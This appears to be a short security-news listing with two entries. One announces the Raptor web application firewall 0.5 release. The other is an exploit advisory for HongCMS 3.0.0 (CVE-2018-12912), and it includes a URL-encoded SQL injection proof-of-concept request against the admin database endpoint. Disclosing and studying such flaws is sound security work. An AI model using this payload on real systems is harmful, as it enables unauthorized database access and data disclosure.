Raptor WAF 0.5 Released


Raptor is a Web application firewall made in C, uses DFA to block SQL injection, Cross site scripting and path traversal. http://funguscodes.blogspot.com.br/ Example [su_quote] Up some HTTPd server at port 80 redirect with raptor to […]

HongCMS 3.0.0 SQL Injection

Exploit Title: HongCMS 3.0.0 – SQL Injection Google Dork: [if applicable] Date: 2018/06/26 Exploit Author: Hzllaga Software Link: https://github.com/Neeke/HongCMS/ Version: 3.0.0 Tested on: php5.4 mysql5 CVE : CVE-2018-12912 POC (Administrator Privilege): [su_quote] /admin/index.php/database/operate?dbaction=emptytable&tablename=hong_vvc%60%20where%20vvcid%3D1%20or%20updatexml%282%2Cconcat%280x7e%2C%28version%28%29%29%29%2C0%29%20or%20%60[/su_quote]